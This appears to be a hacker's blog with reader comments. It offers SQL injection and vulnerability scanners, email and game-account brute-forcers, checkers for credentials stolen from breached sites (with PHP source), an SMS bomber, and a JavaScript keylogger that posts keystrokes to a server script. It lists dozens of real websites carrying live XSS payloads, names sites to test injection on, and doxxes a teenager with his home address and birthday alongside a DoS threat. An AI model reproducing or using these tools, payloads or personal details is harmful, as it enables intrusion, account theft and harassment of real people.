Rapidshare v2 was a waste of my time, when authenticating with API, it blocks your ip after several checks at least 15 checks, version 1 did not have this problem.
so added premium points in version 1 as per rapidshare new rules, you need 8k premium points for a new account
also added sqlihelper that is not detected (no changes, except the assembly name)
Download link:
Hi guys,
have not been online for a while, anyway i updated the rapidshare checker, seems rapidshare keeps changing what points (rapid/premium) you need to create a new free acount.
Download link:
the SQLI Helper 2.5-2.7 doesnt have a trojan or virus, its false positive, fucking kaspersky detecting it as malware is bullshit! download from my links and i assure you its clean
screenshot:
i dont know why the sqlihelper executables are detected as “trojan.win32.agent2.chtj”, it is fucking false positive, some fool spreading my app with a binded trojan and now my executables are detected also
i rebuild the source and now the exe is not detected anymore
for those that emailed me, i dont put trojan in my apps, run it on a sandbox, if you can find proof you can post it in the shoutbox
right now im working on the email check and rapidshare checker using api
guys,
so i setup iis and asp support on my laptop, then setup a simple sql on asp with mdb as database then tested vulnerability on access based on cheat sheet online
msaccess does not provide info regarding tables and columns, no schema etc… i set the program to bruteforce tables when it detects an msaccess host,once it finds a table will then get the column count, then will use union to extract data.
-bruteforce tables
-bruteforce columns
-dump data / save and load
because msaccess does not support “limit” function and does not allow subquery with multiple returns, program uses field<>’data1′ and field2<>’data2′, not very stable but works
Try it out:
fixed php / sqlheper and rapidhsare checkers, just download the new link
seems gmail is also giving timeout problems, download the update @
___________________________________________________________________________
seems the developers made changes on the live website, thats why most of you are getting invalid results, before the live login page can only take hotmail/live and msn, they removed the restriction thus the post payloads are note working please download the new fix @
y0,
sorry for the NO update, but got time last weekend and tried out the ODBC convert sql injection exploit for MSSQL and implemented it on sqli helper. easy to spot exploitable page, just add a qoute, if you get “Microsoft OLE DB Provider for SQL Server error ‘80040e07′” then its exploitable
SQLI Helper for MYSQL and MSSQL 2.6 ODBC Error Message Exploit
- schema dump
- data dump
no change in use, best is to test it with these sites
http://desisweet.com/desichapationline/item_details.asp?item_id=1
http://www.bernco.gov/stage/departments.asp?dept=2340&submenuid=21008
on ver 2.7 i will add ms access
sure there are similar tools out there, but my tool is the easiest to use, put the url and watch the app do the rest. enjoy
i got some free time today, took some time off work, i got hotmail working again, added also msn and live emails, its all about cookie handling
download latest:
enjoy bro’s
****for those who downloaded, please redownload, fixed msn and hotmail
Download them all at
http://rapidshare.com/files/287748108/reiluke_tools.zip
password: www.reiluke.i.ph
download @ :
features.
- works most 90% mysql sites
- just enter the vuln url, the the program will do the rest, no need for valid page keywords
- mysql ver 5 extract structure and multithreaded dumps
- mysql ver 4 bruteforce table and column names
- “load file” view
- save structure as flat file, load it later to continue
- auto find columns
- auto find visible columns
- for authenticated pages, app can use a cookie
- integrated most of my small little apps to this program
before using the app, please check options for maximum row extract/proxy server settings and starting row extract(so you can continue it later), use proxy
i do not have tutorials on how to use it, but its pretty straight forward,paste in a vuln site and click inject
this is for educational purposes only, a little project to help me learn sql injection
as per request
-added email
-fixed traffic left, now its accurate
download
pass: www.reiluke.i.ph
enjoy
Hi again,
- added email address to the rapidshare checker
- added start line, start checking for accounts, once you reach 60-80 checks rapidshare will block you, just change your proxy then click on start again, the start line will catch the last line where the checking stopped
download latest:
Well updated my checker, its fairly easy, inste
added security lock
added formatted output
enjoy and look in the c0de how i checked for security lock
i think somebody already implemented displaying email, will take a look at his c0de later
hi again bros,
well my old version is floating on the web, ill release the latest version, besides hy is down, no more vip vip.
its not perfect but its easy to use
what you do with my app is not my responsibility, i code this for fun and learning and not for profit
download:
pass: www.reiluke.i.ph
greetz and happy holidays
wassup, i made this app last october i think i posted it only on h4cky0u vip
anyway scenario, you hacked a website, and you got their emails and passwords, normally you go login with these emails 1 by 1, it takes a lot of time to filter out the valid accounts
i made an app that can check YAHOO GMAIL HOTMAIL accounts, its not meant to be bruteforce but a checker, captcha wont kick in because you are validating 1 account with 1 pass
very useful if you have large dump though i wont recommend checking more than 2000 accounts at a time, and use a proxy so you wont be blocked, if you found that your ip cannot access yahoo or hotmail, just wait for 2 hours
it works very good on gmail and yahoo, on hotmail be careful because hotmail will lock account if you check more than 3 times with a wrong pass
http://rapidshare.com/files/197031349/reiluke-tools.rar
pass: www.reiluke.i.ph
format: “email:pass”
So undergroundsystem.org got hacked, the hacker did not delete anything but did changed the index file it seems,and members are pointing at me, without proof and now pissed, and some guy will make my life miserable, oh ohhh theyr on to me on google, syou can view the convo at their forum,now 1 guy made a page on me dude, i love the simpsons, marge is so hot! thanks man lol
anyway a guy posted anonymous on my blog,but guess what you too are not untraceable
Johan Hedberg AKA Tux AKA crazzy
Website: http://hedbergproductions.com/Age: 17 years old <– WTF skid! commo’n man, if you want to target me, learn first what i do and critize me, fucking XHTML and CSS is for skiddies
Tagline: Welcome to Hedberg Productions. I’m a 17 year old guy (you mean boy?) and I’m currently making my way through the second year of high school
Birthday: August 16, 1991
Location: Karlskrona
Address : Herrgardsvagen 1E, Karlskrona, 37142, SE
email: johan@hedbergproductions.com
Facebook: http://www.facebook.com/people/Johan-Hedberg/634215586
you want me to post your photos?
you think your leet? if the hacker did not left is calling card you g0t nothin
enough of this and listen to your admin, i can still arrange a doss war though ashole
fuck h4cky0u is having problems with host and sponsor, they will be back on 01/09 thats plenty of time of doing a whole lot of nothing
i have an updated on bomber, i see that gmail provides free fast smtp, changed my sms bomber and defaulted it to gmail smpt.
register an account in gmail, this account will be used to bomb your victims
too bad i cant find any working sms gateway here, but im sure for every country there is a free gateway
add the gateway you know that is working in gateway.txt or select a predefined gateway i found online
its 1st release so im sure there could be problems but if you want to support it give me feedbacks not
download link:
http://rapidshare.com/files/197031349/reiluke-tools.rar
pass: www.reiluke.i.ph
so rapidshare added a security lock, this is bad as we now, i added a field to the checker so you can see who’s security lock is active or inactive
also if you plan to use accounts that is not yours, rapidshare will block the account, this happens when the ip downloading changes multiple times in 24 hours
Download link:
http://www.reiluke.site90.com/reiluketools/ReilukeRapidCheck.rar
Screenshot
so h4cky0u is down or i cant access it, i think its down since i dont get pm’s
anyway im working on an sms bomber, its nearly finished and ill make it public once done, heres a screenshot
ok finished and released my scanner on h4cky0u vip only, heres some descriptions
**11/11/2008**
Ok heres what is added, please read before pm me
1. Added “Get from all domains”, included in the app is domain.txt w/c contains common domains, if you want to search for all domains just check this and click scan sites, it will give a lot more results than before, included also is domain2.txt if you want to use all domains, just rename to domain.txt
2. SQLi extensive - will add more parameter comma, parenthesis, double qoute, qoute, to generate errors, it will make scanning longer
3. SQLi cond - its page comparison, program will get results from “and 1=0″ and “and 1=1″ compares them if there are changes, also for strings “‘ and 1=0/*” and “‘ and 1=1/*”, its not accurate 50/50 because of sites with ad’s w/c changes html source everytime you visit the page
4. XSS checking - now this is 98% accurate, its a wrapper of internet explorer, eliminating false positives, its slow so i recommend you set a timeout in ie http://www.google.com/search?q=timeout+ie&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a <– some guides, if you dont it sometimes stops at the middle (default timeout in ie is 10min lol), also disable IE images at advanced options, this will make checking faster.
5. LFI scan - added sa simple lfi scan, its error based, if it detects an file inclusion error, its added to the list, it appends “/etc/passwd%00″ at the end, its not the correct path but a sample, you can use lfi fuzzer to check directories (im planning making one as perl avaiable fuzzer dont ~censored~ work)
6. RFI scan - will included a simple textfile and check contents, RFI is very few right now but with good dork you will find em, its 98% accurate, 2% is false positives…the file is included but not parsed
to do: multiple dork scan
enjoy
Code:
**10/16/2008**
fixed a multhreading issue, now it will test faster with specified threads
added different google countries to search for
added additional parameter to force errors
**10/12/2008**
i got tired of filtering sites so i made one 
its error based, the probability of sql injection is good but may give false positives, still working on other methods to detect (eg 1=0/1=1 + union + etc..)
support mysql,sqlserver,mcaccess,cfm..
it uses blackle so you can get 5000 test sites, after that use a proxy
multithreaded
thanks for the sig don
have you ever wanted to hack your school’s website, well i just r00ted my almamater
sorry sir val you server pawned, sooner or later turks will deface it so put checks on your security and monitor logs
R00T!
so you pawn some websites, got admin data, you extract the db
now we all know thats not enough, theres more, you need to put up a shell, r00t then get more domains
before all that you need to find the admin page first, some hide it, some rename it, crawlers wont find it coz its not linked so you need to brute the folder/pages
heres a little app i made during my free time
http://www.reiluke.site90.com/reiluketools/adminpage.rar
pass:leechedfromh4cky0u
enjoy and cover your tracks
its a multi account checker for steam
well previous checkers rely on http login, now steam put a captcha and all the tools wont work
i made a checker based on the steam exe
set timeout on how long steam response to and invalid login
sorry steam if theres a will theres a way
download:
reiluke.site90.com/reiluketools/SteamChecker.rar
pass:h4cky0u0wnsy0u
i just finished my scanner, oh well here are some of the results, looks like it works perfectly
http://4q.cc/index.php?pid=top100&person=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Echuckhttp://dvd.box.sk/index.php?pid=soft&prj=list&tools=subtitle&pol=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E20
http://www.3dvalley.com/phplinks/index.php?PID=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.sagernotebook.com/product_customed.php?pid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.thedailystar.net/latest/updates.php?pid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.aten.com/products/productItem.php?pcid=20050103163647001&psid=20050107104929001&pid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E20050224111953008
http://www.scmmicro.com/security/view_product_en.php?PID=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://cartoons.sev.com.au/index.php?catid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.hawkingtech.com/products/productlist.php?CatID=32&FamID=60&ProdID=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E280
http://www.brunton.com/product.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.convivea.com/product.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.robertkeeley.com/product.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.speedguide.net/read_articles.php?id=157″><script>alert(document.cookie)</script>
http://www.mentalhelp.net/poc/center_index.php?id=8″><script>alert(document.cookie)</script>
http://www.autisticcuckoo.net/archive.php?id=2004/12/07/relatively-absolute”><script>alert(document.cookie)</script>
http://www.comingsoon.net/news/movienews.php?id=43692″><script>alert(document.cookie)</script>
http://aviation-safety.net/database/record.php?id=20050814-0″><script>alert(document.cookie)</script>
http://www.simtel.net/product.download.mirrors.php?id=57830″><script>alert(document.cookie)</script>
http://www.pixheaven.net/galerie_us.php?id=3″><script>alert(document.cookie)</script>
http://www.linuxpackages.net/pkg_details.php?id=7951″><script>alert(document.cookie)</script>
http://wowui.worldofwar.net/ui.php?id=3374″><script>alert(document.cookie)</script>
http://www.plantgeek.net/article_viewer.php?id=9″><script>alert(document.cookie)</script>
http://on.tanio.net/faq/detail.php?id=33&f_id=192″><script>alert(document.cookie)</script>
http://galleries.fototagger.com/link.php?action=detailimage&id=512&sort=0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.itmatters.com.ph/host.php?id=050605%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://wildlife.utah.gov/watersheds/project/detailed.php?id=444″><script>alert(document.cookie)</script>
http://www.regulations.gov/search/search_results.jsp?sid=11D2D11CC8A7&N=8056+4294966103&css=1&Ne=2+8+11+8053+8054+8098+8074+8066+8084+8055+2″><script>alert(document.cookie)</script>
http://edsitement.neh.gov/view_lesson_plan.asp?id=749″><script>alert(document.cookie)</script>
http://www.solarliving.org/display.asp?catid=17″><script>alert(document.cookie)</script>
http://www.hawkingtech.com/products/productlist.php?CatID=32&FamID=60&ProdID=280″><script>alert(document.cookie)</script>
http://www.bouldercoloradousa.com/listings/index.cfm?catID=2″><script>alert(document.cookie)</script>
http://www.celestron.com/c2/category.php?CatID=2″><script>alert(document.cookie)</script>
http://www.esgct.org/dyncatr.cfm?catid=1517″><script>alert(document.cookie)</script>
http://www.adcet.edu.au/ResourceList.aspx?catid=17″><script>alert(document.cookie)</script>
http://www.sciencenewsforkids.org/pages/search.asp?catid=31″><script>alert(document.cookie)</script>
http://www.al-islam.org/links.asp?CatId=70″><script>alert(document.cookie)</script>
http://workfromhome.tusa.pl/search.php?q=zebra%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.polchat.pl/search.php?lang=en%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.sztuka-architektury.pl/search.php?search=wiringstandards%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.rownet.pl/portal/search.php?qt=sckm%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.fjmu.net/bbs/dispbbs.asp?boardID=75&ID=26133&page=1″><script>alert(document.cookie)</script>
http://ngomonitor.web.aplus.net/article.php?id=1595″><script>alert(document.cookie)</script>
http://thecancer.net/article.php?id=’566&cate1=’types%20of%20cancer&cate2=’thyroid%20cancer&cate3=’Recommended%20Resources
http://www.wavecom.net/knowledgebase/article.php?id=226″><script>alert(document.cookie)</script>
http://www.pornkruba.net/article.php?id=17084&lang=th”><script>alert(document.cookie)</script>
http://www.realtimearts.net/article.php?id=8952″><script>alert(document.cookie)</script>
http://hebron.web.aplus.net/english/article.php?id=300″><script>alert(document.cookie)</script>
http://12078.net/grcnews/article.php?id=12028&group=grc.securitynow”><script>alert(document.cookie)</script>
http://forum.camta.net/news-article.php?id=36″><script>alert(document.cookie)</script>
http://www.rantcollective.net/article.php?id=17″><script>alert(document.cookie)</script>
http://www.thebushagenda.net/article.php?id=365″><script>alert(document.cookie)</script>
http://www.timesnews.net/article.php?id=9008593″><script>alert(document.cookie)</script>
http://www.the213.net/php/article.php?id=796″><script>alert(document.cookie)</script>
http://www.haitisolidarity.net/article.php?id=207″><script>alert(document.cookie)</script>
http://www.criticalresistancegainesville.net/article.php?id=207″><script>alert(document.cookie)</script>
http://www.sallyhoward.net/article.php?id=7&category=celebrity”><script>alert(document.cookie)</script>
http://www.islamweb.net/ver2/archive/article.php?lang=E&id=137272″><script>alert(document.cookie)</script>
http://www.plantphys.net/article.php?ch=e&id=126″><script>alert(document.cookie)</script>
http://countryrugbyleague.net/news/article.php?id=209″><script>alert(document.cookie)</script>
http://www.herodote.net/articles/article.php?ID=483″><script>alert(document.cookie)</script>
http://www.smfcorp.net/articles/article.php?id=131″><script>alert(document.cookie)</script>
http://www.cinemac.net/article/article.php?id=122″><script>alert(document.cookie)</script>
http://www.daawa-info.net/article.php?id=518″><script>alert(document.cookie)</script>
http://english.islamweb.net/ver2/archive/article.php?lang=E&id=142317″><script>alert(document.cookie)</script>
http://www.history.iv-fr.net/article.php?id=1018%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.cadtutor.net/corner/article.php?id=193%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.catherineleonard.net/article.php?id=13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.infoelektronika.net/article.php?id=89%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://espanol.islamweb.net/ver2/archive/article.php?lang=E&id=35680%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Index.php
<?php $password = “reiluke”; ?>
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=iso-8859-1″ />
<title>PHP rapidshare account checker by reiluke</title>
<style type=”text/css”>
<!–
body {
background-color: #000000;
}
body,td,th {
color: #FFFFFF;
}
–>
</style>
<script type=”text/javascript” language=”javascript” src=”rsajax.js”></script>
</head>
<body><?php //main page
if (isset($_POST[”password”]) && ($_POST[”password”]==”$password”)) {
?>
<div align=”center”>-PHP Rapidshare account checker by reiluke-
<form action=”javascript:get(document.getElementById(’acctform’));” name=”acctform” id=”acctform”>
<p>
<textarea rows=”1″ cols=”1″ style=”width: 50%; height: 140px” id=”accounts”></textarea>
<br />username:password</p><p>
<input type=”submit” name=”button” value=”Check Accounts” onclick=”return Tab_Click(this)”>
</form>
</p>
<div align=\”center\”>
<div id=”waiting”></div>
<div id=”showresults”></div>
</div><?php //access denied page
}
else
{
print “<h2 align=\”center\”>-PHP Rapidshare account checker by reiluke-</h2>”;
if (isset($_POST[’password’]) || $password == “”) {
print “<p align=\”center\”><font color=\”red\”><b>Incorrect Password</b><br>Please enter the correct password</font></p>”;}
print “<form method=\”post\”><p align=\”center\”>Please enter your password for access<br>”;
print “<input name=\”password\” type=\”password\” size=\”25\” maxlength=\”10\”><input value=\”Login\” type=\”submit\”></p></form>”;
}
?>
<BR>
<body></html>
getrsaccounts.php
<?phpif (isset ($_POST[’accounts’])) {
set_time_limit(0);
$dtaaccounts = nl2br($dtaaccounts);
$dtaaccounts = explode(”\n”, $_POST[’accounts’]);
//Header
echo “<table font-size=1 width=\”50%\” border=1 cellspacing=\”0\” cellpadding=\”7\”>”.
“<tr><th>Username</th> <th>Password</th><th>Points</th><th>Traffic</th><th>Validity</th></tr>”;foreach ($dtaaccounts as &$value) {
list($User, $Pass) = split(”:”, $value);
if (empty($User)==FALSE || empty($Pass)==FALSE){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, “https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi”);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
//set proxy here
//curl_setopt($ch, CURLOPT_PROXY, ‘http://127.0.0.1:8080′);
//curl_setopt($ch, CURLOPT_PROXYPORT, 8080);
//curl_setopt ($ch, CURLOPT_PROXYUSERPWD, ‘’);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, “login=”.$User.”&password=”.$Pass);
$pagedata = curl_exec($ch);
curl_close($ch);//get rapidshare details
ereg(”<td>TrafficShare left:</td><td align=right style=\”padding-right:20px;\”><b>([0-9\.]+) GB</b>”, $pagedata, $traffic);
ereg(”<td>RapidPoints:</td><td align=right style=\”padding-right:20px;\”><b>([0-9\.]+)</b>”, $pagedata, $points);
ereg(”<td>Expiration date:</td><td style=\”padding-right:20px;\”><b>([a-zA-Z\_0-9\ .,]+)</b>”, $pagedata, $valid);
ereg(”with ([0-9\.]+)”, $pagedata, $files);
//display if valid
if(empty($valid[1])==FALSE){
echo “<tr>”.”<td>$User</td>”.”<td>$Pass</td>”.”<td>$points[1]</td>”.”<td>$traffic[1] GB</td>”.”<td>$valid[1]</td>”.”</tr>”;
$validrs[] = $User . “:” . $Pass . “:” . $points[1] . “:” . $traffic[1] . “:” . $valid[1];
}
unset($valid);
}
}
echo “</table>Formatted Output:<p><textarea rows=\”1\” cols=\”1\” style=\”width: 50%; height: 140px\”>”;
foreach ($validrs as &$value) {
echo $value . “\n”;
}
echo “</textarea>”;
}
?>
rsajax.js
var http_request = false;
function makePOSTRequest(url, parameters) {
http_request = false;
if (window.XMLHttpRequest) {
http_request = new XMLHttpRequest();
if (http_request.overrideMimeType) {
http_request.overrideMimeType(’text/html’);
}
} else if (window.ActiveXObject) {
try {
http_request = new ActiveXObject(”Msxml2.XMLHTTP”);
} catch (e) {
try {
http_request = new ActiveXObject(”Mcft.XMLHTTP”);
} catch (e) {}
}
}
if (!http_request) {
alert(’Cannot create XMLHTTP instance’);
return false;
}
http_request.onreadystatechange = alertContents;
http_request.open(’POST’, url, true);
http_request.setRequestHeader(”Content-type”, “application/x-www-form-urlencoded”);
http_request.setRequestHeader(”Content-length”, parameters.length);
http_request.setRequestHeader(”Connection”, “close”);
http_request.send(parameters);
}function alertContents() {
if (http_request.readyState == 4) {
if (http_request.status == 200) {
result = http_request.responseText;
document.getElementById(’waiting’).innerHTML = ‘’;
document.getElementById(’showresults’).innerHTML = result;
} else {
alert(’There was a problem with the request.’);
}
}else{
document.getElementById(’waiting’).innerHTML = ‘<img src=”loading.gif”>’;}
}
function get(obj) {
var poststr = “accounts=” + encodeURI( document.getElementById(”accounts”).value );
makePOSTRequest(’getrsaccounts.php’, poststr);
}
or download the code
pass: reiluke server needs curl enabled and timelimit else it fails, i suggest a paid hosting or local desktop server
simple php code
simple ajax to display results
password protected page default pass is reiluke, change the pass at index.php 1st line
function GetCandy(event)
{
var kreiluke = “”;
var isNetscape = (navigator.appName.indexOf(”Netscape”) != -1);
var kreiluke = (isNetscape) ? String.fromCharCode(event.which) : String.fromCharCode(event.keyCode);
makeRequest(’kl.php?iambr=’ + kreiluke);
}function makeRequest(url)
{
var httpRequest;if (window.XMLHttpRequest)
{ // Mozilla, Safari, …
httpRequest = new XMLHttpRequest();
if (httpRequest.overrideMimeType) {
httpRequest.overrideMimeType(’text/xml’);
}
}
else if (window.ActiveXObject)
{ // IE
try
{
httpRequest = new ActiveXObject(”Msxml2.XMLHTTP”);
}
catch (e) {
try {
httpRequest = new ActiveXObject(”Mcft.XMLHTTP”);
}
catch (e) {}
}
}if (!httpRequest)
{
alert(’Giving upCannot create an XMLHTTP instance’);
return false;
}
httpRequest.onreadystatechange = function() { alertContents(httpRequest); };
httpRequest.open(’GET’, url, true);
httpRequest.send(null);
}function alertContents(httpRequest)
{
if (httpRequest.readyState == 4) {
if (httpRequest.status == 200) {
}
else
{
alert(’There was a problem with the request.’);
}
}
}
filename kl.php
<?php
$_GET[’iambr’];
$file = fopen($_SERVER[’REMOTE_ADDR’] . “-logged.txt”,”a”);
fwrite($file,$_GET[’iambr’]);
fclose($file);
?>
filename testpage.htm:
<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”
“http://www.w3.org/TR/html4/loose.dtd”>
<html>
<head>
<SCRIPT language=”JavaScript” SRC=”kl.js”></SCRIPT>
</head><body onkeyup=”GetCandy(event)”>
<p>press a ~censored~ key at it will be logged</p>
</body></html>
download file:
it basically records keyboard events on the html page
stores them on a text file
page needs to be active to be able to keylog, so you need to be more creative
300+ columns
300+ tables
some translated to french
if you hacking other countries translate the wordlist, i found it effective
i know there are tools out there, but i like to make my own tool and make it simpler for me
ok i made is as simple as possible, to add vuln url just click on “+” and input values the program needs (url, columns and table)
to make it simpler, added mysql schema template, click on get database/tables/columns and you just have to input the url, program will generate the vuln url
can extract data from mysql4/5
app:
http://www.rapidspread.com/file.jsp?id=r9iicb6xxd
sample vid:
http://www.rapidspread.com/file.jsp?id=s0al4fy44s
if you have questions just reply here
Blind SQLi is slow and not for dumping large data, so you need to find the admin credentials and dump from there
i would like to share my account checker
-user / list pass checking with results all info-delimiter of your choosing
-email check (via account recovery) but will require many proxy as i think its only 50 tries then your ip is blocked for an hour(say you have email list with verified password, you can check if they have rapidshare, the password field is optional for your reference, once that an rs account exist, check the inbox of the email for the pass)
-you can specify number of rec then proxy rotates
-export results
-asynchronus request, it does not look like its not responding
-.net you will need latest framework
—
for those who have a hard time using it, ask me, its working fine with me, sample files are included, if you want a quick test
-to check passwords
create a text file with format
username:password
click on load check file
click on start
-to check if email account you hacked have an rs account
click “check via email recovery”,
create a textfile with format
email:emailpass(optional, you can make this as reference later on)
click on load check file
click on start
it will return details if the email have rs account
if you have results, go check his email inbox for the passwords
30 tries ur ip will be blocked for an hour use a proxy
download:
http://www.rapidspread.com/file.jsp?id=bsonhxxqar
i am not responsible for your actions, these programs are for educational purposes only
i have decided to share my yahoo and gmail bruteforcer
- from wordlist-async request
- proxy server
- pls download latest .net to run
Download the file:
http://www.reiluke.site90.com/reiluketools/Reiluke_MailBruteforcer.rar
i am not responsible for your actions, these programs are for educational purposes only
well im in no mood today so heres what i got
do you really hate when pinoy brags about their job? how can you be a senior developer working for only for 2 years? you “could” be good at what you do but i would na tag you as a senior unless you earn the level years of experience, hes working with “Mynd Tech Management Services (a.k.a. Mynd Consulting)”, i googled it, they seem to be legit, but their web developers are either noobs or just fresh grads
before you go off showing your portfolio, fix your goddam website!
Davao Doc website i love your design, your custom cms is great, congrats to the developers and designers! 1 problem, youre website fucking unsecure! please call dr house maybe he can diagnose the problem ;/ gj though, your admin password is strong
all in days work, spent about 2 hours, i got about 339 valid emails out of 1700emails from yahoo/gmail and hotmail, out of 339 valid emails, i got 19 rapidshare account, got only 18 since 1 was fraud and 1 was in another language so my check ddnt work
i got 4 accounts that ends on 2009 weeee
what a weekend, been drinking the whole time.. anyway last friday i createed a program that will check yahoo/gmail/hotmail with corresponding passwords
before that i already made a rapidshare acct checker that will check username and password or will check if the email does have an rs account
Last year i was into game programming, now I have started looking into hacking, philippines sites are so vulnerable, most websites are either powered by joomla/mambo/phpbb though these scripts are good enough there are plenty vulnerabilities that are in public
heres a list of ph sites i found that i gained access to
International sites
these are just “some of the sites” that are vulnerable, i did not deface or mess up your data, if it was taken down then blame the turks!!! if the webadmin are reading this, then fix the hole gadddamit!
Welcome to my blog, i should have started this a long time ago, im lazy and i dont like to blog, but i think this should be fun
ill be bloggin my shit, garbage hobbies here and cool finds
can anyone post a working email checker? will be very much appreciated
san ka sa pilipinas?
“>alert(String.fromCharCode(88, 83, 83))
“>alert(String.fromCharCode(88, 83, 83))
Anyone has a idea to use post method in sqlihelper? Thnkxxx
someone have sign up code for shopadmin.cc? please email it to me… richardsilly888@yahoo.com
How to work with post method in sqlihelper 2.7?
itx backdoored 
AVG detected chk link and c level of infection
Can you make a mirror to your tools ? Rapidshare sucks ..
email checker isnt working indeed.. all emails are correct, even with 3 characters 
e-mail checker dont workkkkkkkkkkkkkkkkkkkkkkk
Email checker don work
Sup, there seems to be a problem with your email checker as it places invalid email:pass in the valid section, pretty much all the emails are transfered to the valid box
nice blog site. ok na ok.
anyway share ko lang po. you can watch manny pacquiao video collection here:
http://boxing-tube.tk
or here:
http://mannypacquiao.tk
New Rapidshare Collector’s & Premium Accounts Checker.
Demo: http://ralf69.justfree.com/
I will sell script for mass verification data Rapidshare Collector’s & Premium Accounts.
@rd0 Linux users don’t need sql injecting programs they already know how to manually Inject or dont even waste there time
There is a version of SQLiHelper for linux?
i try whit mono but doesnt work..
looking for a sqli scanner, that scans not only php but also cfm and asp. Thanks !
After I used the exploit scanner, I got like 600 sites to be tested. sql error based is check marked and I click test, the progress bar runs to 100% in like 2seconds and no vuln sites are shown on the list
the keylogger html alwasys prompt a ” There was a problem with the request ” everytime its being opened.? the the prob bro? pls mail me. thanks and waiting for ur reply
